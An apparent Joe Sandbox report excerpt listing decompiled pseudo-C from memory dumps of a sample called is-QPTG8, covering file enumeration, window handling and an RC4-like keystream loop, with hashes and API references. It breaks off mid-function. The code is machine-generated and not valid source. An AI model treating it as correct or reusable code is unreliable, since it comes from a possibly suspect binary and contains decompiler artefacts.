FindClose.KERNEL32(00000000,00000000,?), ref: 00407012
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040702B
FileTimeToDosDateTime.KERNEL32 ref: 0040703C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: e4b6d1b4c279bb9197bc83ebcfb047ca9b5590963a2a8d0768558ea967f0da3f
Instruction ID: 182d636030489825f0dfe128ab23e0530f4454b1f6441d81bde3cfb923cc52d6
Opcode Fuzzy Hash: e4b6d1b4c279bb9197bc83ebcfb047ca9b5590963a2a8d0768558ea967f0da3f
Instruction Fuzzy Hash: 74F0F4B2D0060CA6CB60EAA98C85ADF73AC9B04324F1017B7B518F21D2E6389B044B55

Uniqueness

Uniqueness Score: -1.00%

Function 0045CA54 Relevance: 4.6, APIs: 3, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0045CA54(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v5;
				void* _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t52;
				void* _t53;
				intOrPtr _t54;

				_t52 = _t53;
				_t54 = _t53 + 0xfffffeb4;
				_v336 = 0;
				_push(_t52);
				_push(0x45cb28);
				_push( *[fs:eax]);
				 *[fs:eax] = _t54;
				_v5 = 0;
				E0042C614(__eax,  &_v336);
				E004036C4( &_v336, 0x45cb44);
				_v12 = FindFirstFileA(E00403880(_v336),  &_v332);
				if(_v12 == 0xffffffff) {
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x45cb2f);
					return E00403548( &_v336);
				} else {
					_push(_t52);
					_push(0x45cb08);
					_push( *[fs:eax]);
					 *[fs:eax] = _t54;
					while(E0045CA08( &_v332) == 0) {
						if(FindNextFileA(_v12,  &_v332) != 0) {
							continue;
						}
						L5:
						_pop(_t48);
						 *[fs:eax] = _t48;
						_push(0x45cb0f);
						return FindClose(_v12);
						goto L7;
					}
					_v5 = 1;
					goto L5;
				}
				L7:
			}

0x0045ca55
0x0045ca57
0x0045ca62
0x0045ca6c
0x0045ca6d
0x0045ca72
0x0045ca75
0x0045ca78
0x0045ca8b
0x0045ca9b
0x0045cab1
0x0045cab8
0x0045cb11
0x0045cb14
0x0045cb17
0x0045cb27
0x0045caba
0x0045cabc
0x0045cabd
0x0045cac2
0x0045cac5
0x0045cac8
0x0045caef
0x00000000
0x00000000
0x0045caf1
0x0045caf3
0x0045caf6
0x0045caf9
0x0045cb07
0x00000000
0x0045cb07
0x0045cad7
0x00000000
0x0045cad7
0x00000000

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,0045CB28), ref: 0045CAAC
FindNextFileA.KERNEL32(000000FF,?,00000000,0045CB08,?,00000000,?,00000000,0045CB28), ref: 0045CAE8
FindClose.KERNEL32(000000FF,0045CB0F,0045CB08,?,00000000,?,00000000,0045CB28), ref: 0045CB02

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 18e7f5f29664dc6f037b9c03b4cb6033851291cd26e1493b1af31712b729ed6f
Instruction ID: fa45188088062e0ad227c2408292bd03dc7ae73c41cd978a3b6dc7f86190da9c
Opcode Fuzzy Hash: 18e7f5f29664dc6f037b9c03b4cb6033851291cd26e1493b1af31712b729ed6f
Instruction Fuzzy Hash: DB21D871904708AEDB11DB65DC82ADEBBBCDB49715F5044F7F808E2292D63C5E48CA68

Uniqueness

Uniqueness Score: -1.00%

Function 004243F4 Relevance: 4.5, APIs: 3, Instructions: 32
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004243F4(void* __eax) {
				struct HWND__* _t10;
				void* _t21;

				_t21 = __eax;
				_t10 = IsIconic( *(__eax + 0x20));
				_t25 = _t10;
				if(_t10 != 0) {
					SetActiveWindow( *(_t21 + 0x20));
					E00423864( *(_t21 + 0x20), 9, _t25);
					E00423D2C(_t21);
					_t10 =  *0x48d62c; // 0x21d0660
					_t24 =  *((intOrPtr*)(_t10 + 0x3c));
					if( *((intOrPtr*)(_t10 + 0x3c)) != 0) {
						_t10 = SetFocus(E004183F8(_t24));
					}
					if( *((short*)(_t21 + 0xd6)) != 0) {
						return  *((intOrPtr*)(_t21 + 0xd4))();
					}
				}
				return _t10;
			}

0x004243f6
0x004243fc
0x00424401
0x00424403
0x00424409
0x00424416
0x0042441d
0x00424422
0x00424427
0x0042442c
0x00424436
0x00424436
0x00424443
0x00000000
0x0042444d
0x00424443
0x00424455

APIs

IsIconic.USER32 ref: 004243FC
SetActiveWindow.USER32(?,?,?,?,004659CB), ref: 00424409

Part of subcall function 00423864: ShowWindow.USER32(00410868,00000009,?,00000000,0041EFBC,00423B52,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042387F

Part of subcall function 00423D2C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021D2410,00424422,?,?,?,?,004659CB), ref: 00423D67

SetFocus.USER32(00000000,?,?,?,?,004659CB), ref: 00424436

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 329907123489f053d4dfacb74e674dc9eab2ad7c4303f55ee0642e52c2bcf29c
Instruction ID: 6b08ad20b92cc5706529d323aabee2376143d053ec5da24cf7c0481393cc913a
Opcode Fuzzy Hash: 329907123489f053d4dfacb74e674dc9eab2ad7c4303f55ee0642e52c2bcf29c
Instruction Fuzzy Hash: FDF0BD61B012208BCB00BFAAA885B9662A8AB48705F55457ABC19DF25BCA79DC018768

Uniqueness

Uniqueness Score: -1.00%

Function 00417EE6 Relevance: 3.0, APIs: 2, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EE6(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void _v64;
				int _t34;
				void* _t52;
				int _t60;
				int _t66;

				_t60 = __ecx;
				_t66 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x24)) || __ecx !=  *((intOrPtr*)(__eax + 0x28)) || _a8 !=  *((intOrPtr*)(__eax + 0x2c))) {
					L5:
					if(E00418590(_t52) == 0 || IsIconic( *(_t52 + 0xc0)) != 0) {
						 *(_t52 + 0x24) = _t66;
						 *(_t52 + 0x28) = _t60;
						 *((intOrPtr*)(_t52 + 0x2c)) = _a8;
						 *((intOrPtr*)(_t52 + 0x30)) = _a4;
						if(E00418590(_t52) != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0xc0),  &_v48);
							E00414874(_t52,  &_v64);
							memcpy( &(_v48.rcNormalPosition),  &_v64, 4 << 2);
							SetWindowPlacement( *(_t52 + 0xc0),  &_v48);
						}
					} else {
						SetWindowPos( *(_t52 + 0xc0), 0, _t66, _t60, _a8, _a4, 0x14);
					}
					_t34 = E00414678(_t52);
				} else {
					_t34 = _a4;
					if(_t34 !=  *((intOrPtr*)(__eax + 0x30))) {
						goto L5;
					}
				}
				return _t34;
			}

0x00417ef1
0x00417ef3
0x00417ef5
0x00417efa
0x00417f15
0x00417f1e
0x00417f4c
0x00417f4f
0x00417f55
0x00417f5b
0x00417f67
0x00417f69
0x00417f7b
0x00417f85
0x00417f95
0x00417fa2
0x00417fa2
0x00417f30
0x00417f45
0x00417f45
0x00417fa9
0x00417f09
0x00417f09
0x00417f0f
0x00000000
0x00000000
0x00417f0f
0x00417fb4

APIs

IsIconic.USER32 ref: 00417F27
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417F45
GetWindowPlacement.USER32(?,0000002C), ref: 00417F7B
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417FA2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 68bfa2c0b502b7b2baf9efa82266a4d1ea8c123c16acf76c31a76a1cacbb94bd
Instruction ID: 1b48aba3109625fad1bf6926ee8665239312e083d5c35127e2aeedfc615c8c91
Opcode Fuzzy Hash: 68bfa2c0b502b7b2baf9efa82266a4d1ea8c123c16acf76c31a76a1cacbb94bd
Instruction Fuzzy Hash: F2014F71204104ABCB10EE69CCC5EE777ACAB49364F154566FD09DF246D739EC8187A8

Uniqueness

Uniqueness Score: -1.00%

Function 004177B0 Relevance: 3.0, APIs: 2, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004177B0(intOrPtr* __eax, void* __edx) {
				intOrPtr _t15;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;
				void* _t27;

				_t27 = __edx;
				_t20 = __eax;
				if(( *(__edx + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(__edx + 8)) == 0x20 ||  *((short*)(__edx + 8)) == 0x2d || IsIconic( *(__eax + 0xc0)) != 0 || GetCapture() != 0) {
					L8:
					return  *((intOrPtr*)( *_t20 - 0x10))();
				}
				_t15 =  *0x48d628; // 0x21d2410
				if(_t20 ==  *((intOrPtr*)(_t15 + 0x28))) {
					goto L8;
				}
				_t17 = E0041F88C(_t20);
				_t26 = _t17;
				if(_t17 == 0) {
					goto L8;
				}
				_t19 = E00415458(_t26, 0, 0xb017, _t27);
				if(_t19 == 0) {
					goto L8;
				}
				return _t19;
			}

0x004177b3
0x004177b5
0x004177c4
0x00417817
0x00000000
0x0041781d
0x004177ed
0x004177f5
0x00000000
0x00000000
0x004177f9
0x004177fe
0x00417802
0x00000000
0x00000000
0x0041780e
0x00417815
0x00000000
0x00000000
0x00417823

APIs

IsIconic.USER32 ref: 004177DB
GetCapture.USER32 ref: 004177E4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: e56c5d6514986ba986c2120c682bbe9a2fdced9cbb6065aa2a235912ba21dbcc
Instruction ID: 486017c59e2672bc12981cb63997abd8cf1bc80a42da47d17c8d115cae623615
Opcode Fuzzy Hash: e56c5d6514986ba986c2120c682bbe9a2fdced9cbb6065aa2a235912ba21dbcc
Instruction Fuzzy Hash: 0AF044317046014BD724BB2EC889AA763F59F44398B14883FE415C7752EB78DCC4C358

Uniqueness

Uniqueness Score: -1.00%

Function 004243AC Relevance: 3.0, APIs: 2, Instructions: 22
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004243AC(void* __eax, void* __ecx) {
				int _t9;
				void* _t17;
				void* _t18;

				_t18 = __ecx;
				_t17 = __eax;
				_t9 = IsIconic( *(__eax + 0x20));
				_t21 = _t9;
				if(_t9 == 0) {
					E00423C9C(_t17, _t18);
					SetActiveWindow( *(_t17 + 0x20));
					_t9 = E00423864( *(_t17 + 0x20), 6, _t21);
					if( *((short*)(_t17 + 0xce)) != 0) {
						return  *((intOrPtr*)(_t17 + 0xcc))();
					}
				}
				return _t9;
			}

0x004243ac
0x004243ad
0x004243b3
0x004243b8
0x004243ba
0x004243be
0x004243c7
0x004243d4
0x004243e1
0x00000000
0x004243eb
0x004243e1
0x004243f2

APIs

IsIconic.USER32 ref: 004243B3

Part of subcall function 00423C9C: EnumWindows.USER32(00423C34), ref: 00423CC0
Part of subcall function 00423C9C: GetWindow.USER32(?,00000003), ref: 00423CD5
Part of subcall function 00423C9C: GetWindowLongA.USER32 ref: 00423CE4
Part of subcall function 00423C9C: SetWindowPos.USER32(00000000,tCB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004243C3,?,?,00423F8B), ref: 00423D1A

SetActiveWindow.USER32(?,?,?,00423F8B,00000000,00424374), ref: 004243C7

Part of subcall function 00423864: ShowWindow.USER32(00410868,00000009,?,00000000,0041EFBC,00423B52,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042387F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: eee3a7ac8e2d7fceff8b3454df25ed245d525021ae50c42a1418eab2fa4ecfac
Instruction ID: 23064693743e0e6edee915c21f282c84837863b0e0412ad5de477ec2cca8a84e
Opcode Fuzzy Hash: eee3a7ac8e2d7fceff8b3454df25ed245d525021ae50c42a1418eab2fa4ecfac
Instruction Fuzzy Hash: 47E01AA130120087DF00FFAED8C4B9A22A8BB48304F5645BABC08CF24BD67CCC008728

Uniqueness

Uniqueness Score: -1.00%

Function 004127F0 Relevance: 1.7, APIs: 1, Instructions: 188
nativeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004127F0(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				void* __edi;
				void* _t46;
				intOrPtr _t53;
				void* _t57;
				signed int _t60;
				void* _t68;
				signed int _t72;
				void* _t74;
				signed int _t78;
				intOrPtr _t82;
				intOrPtr _t87;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int _t126;
				intOrPtr _t128;
				intOrPtr _t135;
				intOrPtr _t138;
				intOrPtr _t143;
				void* _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr* _t149;
				intOrPtr _t151;

				_t149 = __edx;
				_v8 = __eax;
				_push(0x4129ed);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t151;
				_t46 =  *__edx - 0x53;
				if(_t46 == 0) {
					_v16 =  *((intOrPtr*)(__edx + 8));
					_t91 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t91;
					if(_t91 < 0) {
						L37:
						_push( *((intOrPtr*)(_t149 + 8)));
						_push( *(_t149 + 4));
						_push( *_t149);
						_t53 =  *((intOrPtr*)(_v8 + 0x10));
						L00405F44();
						 *((intOrPtr*)(_t149 + 0xc)) = _t53;
						_t118 = _t53;
						 *[fs:eax] = _t118;
						return 0;
					}
					_t92 = _t91 + 1;
					_t145 = 0;
					__eflags = 0;
					while(1) {
						_t57 =  *((intOrPtr*)( *((intOrPtr*)(E0040B654(_v8, _t145))) + 0x2c))();
						_t121 = _v16;
						__eflags = _t57 -  *((intOrPtr*)(_t121 + 0xc));
						if(_t57 ==  *((intOrPtr*)(_t121 + 0xc))) {
							break;
						}
						_t145 = _t145 + 1;
						_t92 = _t92 - 1;
						__eflags = _t92;
						if(_t92 != 0) {
							continue;
						}
						goto L37;
					}
					E0040B654(_v8, _t145);
					_t60 = E00412430(1,  *((intOrPtr*)(_v16 + 8)));
					__eflags = _t60;
					if(_t60 == 0) {
						E0040B654(_v8, _t145);
						__eflags = 0;
						_t60 = E00412430(0,  *((intOrPtr*)(_v16 + 0xc)));
					}
					_t125 =  *0x48d62c; // 0x21d0660
					_t126 =  *(_t125 + 0x40);
					__eflags = _t126;
					if(_t126 != 0) {
						__eflags =  *(_t126 + 0x110) & 0x00000008;
						if(( *(_t126 + 0x110) & 0x00000008) == 0) {
							E00424B04(_t60);
						} else {
							E00424B10();
						}
						_pop(_t128);
						 *[fs:eax] = _t128;
						return 0;
					} else {
						_pop( *[fs:0x0]);
						return _t60;
					}
				}
				_t68 = _t46 - 0xbe;
				if(_t68 == 0) {
					_t94 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t94;
					if(_t94 < 0) {
						goto L37;
					}
					_t95 = _t94 + 1;
					_t146 = 0;
					__eflags = 0;
					while(1) {
						E0040B654(_v8, _t146);
						_t72 = E00412464( *(_t149 + 4), __eflags);
						__eflags = _t72;
						if(_t72 != 0) {
							break;
						}
						_t146 = _t146 + 1;
						_t95 = _t95 - 1;
						__eflags = _t95;
						if(_t95 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t135);
					 *[fs:eax] = _t135;
					return 0;
				}
				_t74 = _t68 - 6;
				if(_t74 == 0) {
					_t97 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t97;
					if(_t97 < 0) {
						goto L37;
					}
					_t98 = _t97 + 1;
					_t147 = 0;
					__eflags = 0;
					while(1) {
						E0040B654(_v8, _t147);
						_t78 = E00412480( *(_t149 + 4), __eflags);
						__eflags = _t78;
						if(_t78 != 0) {
							break;
						}
						_t147 = _t147 + 1;
						_t98 = _t98 - 1;
						__eflags = _t98;
						if(_t98 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t138);
					 *[fs:eax] = _t138;
					return 0;
				}
				if(_t74 == 8) {
					_v9 = 0;
					__eflags =  *(__edx + 6) & 0x00000010;
					if(( *(__edx + 6) & 0x00000010) != 0) {
						_v9 = 1;
					}
					_t100 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t100;
					if(__eflags < 0) {
						L24:
						_t82 =  *0x48d628; // 0x21d2410
						E00424D0C(_t82, 0, _t144, __eflags);
						goto L37;
					} else {
						_t101 = _t100 + 1;
						_t148 = 0;
						__eflags = 0;
						while(1) {
							__eflags = E00412400(E0040B654(_v8, _t148), _v9,  *(_t149 + 4) & 0x0000ffff);
							if(__eflags != 0) {
								break;
							}
							_t148 = _t148 + 1;
							_t101 = _t101 - 1;
							__eflags = _t101;
							if(__eflags != 0) {
								continue;
							}
							goto L24;
						}
						_t87 =  *0x48d628; // 0x21d2410
						E00424D0C(_t87,  *((intOrPtr*)(_t86 + 0x38)), _t148, __eflags);
						_pop(_t143);
						 *[fs:eax] = _t143;
						return 0;
					}
				}
				goto L37;
			}

0x004127f9
0x004127fb
0x00412801
0x00412806
0x00412809
0x0041280e
0x00412811
0x00412916
0x0041291f
0x00412920
0x00412922
0x004129c9
0x004129cc
0x004129d0
0x004129d3
0x004129d7
0x004129db
0x004129e0
0x004129e5
0x004129e8
0x00000000
0x004129e8
0x00412928
0x00412929
0x00412929
0x0041292b
0x00412937
0x0041293a
0x0041293d
0x00412940
0x00000000
0x00000000
0x004129c1
0x004129c2
0x004129c2
0x004129c3
0x00000000
0x00000000
0x00000000
0x004129c3
0x00412947
0x00412955
0x0041295a
0x0041295c
0x00412963
0x0041296f
0x00412971
0x00412971
0x00412976
0x0041297c
0x0041297f
0x00412981
0x0041298f
0x00412996
0x004129b2
0x00412998
0x004129a4
0x004129a4
0x004129b9
0x004129bc
0x00000000
0x00412983
0x00412983
0x00000000
0x0041298a
0x00412981
0x00412817
0x0041281c
0x00412837
0x00412838
0x0041283a
0x00000000
0x00000000
0x00412840
0x00412841
0x00412841
0x00412843
0x00412848
0x00412851
0x00412856
0x00412858
0x00000000
0x00000000
0x00412867
0x00412868
0x00412868
0x00412869
0x00000000
0x00000000
0x00000000
0x0041286b
0x0041285c
0x0041285f
0x00000000
0x0041285f
0x0041281e
0x00412821
0x00412876
0x00412877
0x00412879
0x00000000
0x00000000
0x0041287f
0x00412880
0x00412880
0x00412882
0x00412887
0x0041288f
0x00412894
0x00412896
0x00000000
0x00000000
0x004128a5
0x004128a6
0x004128a6
0x004128a7
0x00000000
0x00000000
0x00000000
0x004128a9
0x0041289a
0x0041289d
0x00000000
0x0041289d
0x00412826
0x004128ae
0x004128b2
0x004128b6
0x004128b8
0x004128b8
0x004128c2
0x004128c3
0x004128c5
0x00412902
0x00412904
0x00412909
0x00000000
0x004128c7
0x004128c7
0x004128c8
0x004128c8
0x004128ca
0x004128e0
0x004128e2
0x00000000
0x00000000
0x004128fe
0x004128ff
0x004128ff
0x00412900
0x00000000
0x00000000
0x00000000
0x00412900
0x004128e7
0x004128ec
0x004128f3
0x004128f6
0x00000000
0x004128f6
0x004128c5
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004129ED), ref: 004129DB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 2de937e24c8a341db88b105a2bfc621b0ec6adfce10c709336754e182a2f6e7e
Instruction ID: cae08053b73bec1755efb0f1183a38ffbc70d66ced2271e9473eb8200285a6a8
Opcode Fuzzy Hash: 2de937e24c8a341db88b105a2bfc621b0ec6adfce10c709336754e182a2f6e7e
Instruction Fuzzy Hash: 165101717082058BD714EB6ED68199AF3E1FF94314F2086ABD844C3365DBB8ECA1CB18

Uniqueness

Uniqueness Score: -1.00%

Function 10001130 Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001130() {
				signed char _t24;
				signed char _t25;
				intOrPtr _t30;
				signed char _t34;
				intOrPtr _t35;
				char _t37;
				intOrPtr _t41;
				char* _t43;
				char* _t48;
				signed char* _t52;
				void* _t54;

				_t41 =  *((intOrPtr*)(_t54 + 4));
				_t35 =  *((intOrPtr*)(_t54 + 0x10));
				_t24 =  *((intOrPtr*)(_t41 + 0x101));
				_t34 =  *(_t41 + 0x100);
				if(_t35 <= 0) {
					 *(_t41 + 0x100) = _t34;
					 *((char*)(_t41 + 0x101)) = _t24;
					return _t24;
				} else {
					_t52 =  *(_t54 + 0x14);
					 *((intOrPtr*)(_t54 + 0x18)) =  *(_t54 + 0x14) - _t52;
					 *((intOrPtr*)(_t54 + 0x20)) = _t35;
					while(1) {
						_t34 = _t34 + 1;
						_t48 = (_t34 & 0x000000ff) + _t41;
						_t37 =  *_t48;
						_t25 = _t24 + _t37;
						 *(_t54 + 0x14) = _t25;
						_t43 = (_t25 & 0x000000ff) + _t41;
						 *_t48 =  *_t43;
						 *_t43 = _t37;
						if( *((intOrPtr*)(_t54 + 0x1c)) != 0) {
							 *_t52 =  *((0 + _t37 & 0x000000ff) + _t41) ^  *( *((intOrPtr*)(_t54 + 0x18)) + _t52);
						}
						_t52 =  &(_t52[1]);
						_t30 =  *((intOrPtr*)(_t54 + 0x20)) - 1;
						 *((intOrPtr*)(_t54 + 0x20)) = _t30;
						if(_t30 == 0) {
							break;
						}
						_t24 =  *(_t54 + 0x14);
					}
					 *(_t41 + 0x100) = _t34;
					 *((char*)(_t41 + 0x101)) =  *(_t54 + 0x14);
					return _t30;
				}
			}

0x10001130
0x10001134
0x1000113a
0x10001141
0x10001147
0x100011c1
0x100011c7
0x100011ce
0x10001149
0x1000114a
0x10001156
0x1000115a
0x10001164
0x10001164
0x10001169
0x1000116c
0x1000116e
0x10001170
0x10001177
0x1000117e
0x10001186
0x10001188
0x1000119b
0x1000119b
0x100011a2
0x100011a3
0x100011a4
0x100011a8
0x00000000
0x00000000
0x10001160
0x10001160
0x100011b1
0x100011b7
0x100011be
0x100011be

Memory Dump Source

Source File: 00000001.00000002.327157354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.327152975.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.327161957.0000000010002000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001000() {

				return 1;
			}

0x10001005

Memory Dump Source

Source File: 00000001.00000002.327157354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.327152975.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.327161957.0000000010002000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0044B450 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0044B450() {
				signed int _t3;
				signed int _t5;
				signed int _t6;
				signed int _t7;
				signed int _t8;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t12;
				signed int _t13;
				signed int _t14;
				signed int _t15;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t50;

				 *0x48d740 =  *0x48d740 + 1;
				if( *0x48d73c == 0) {
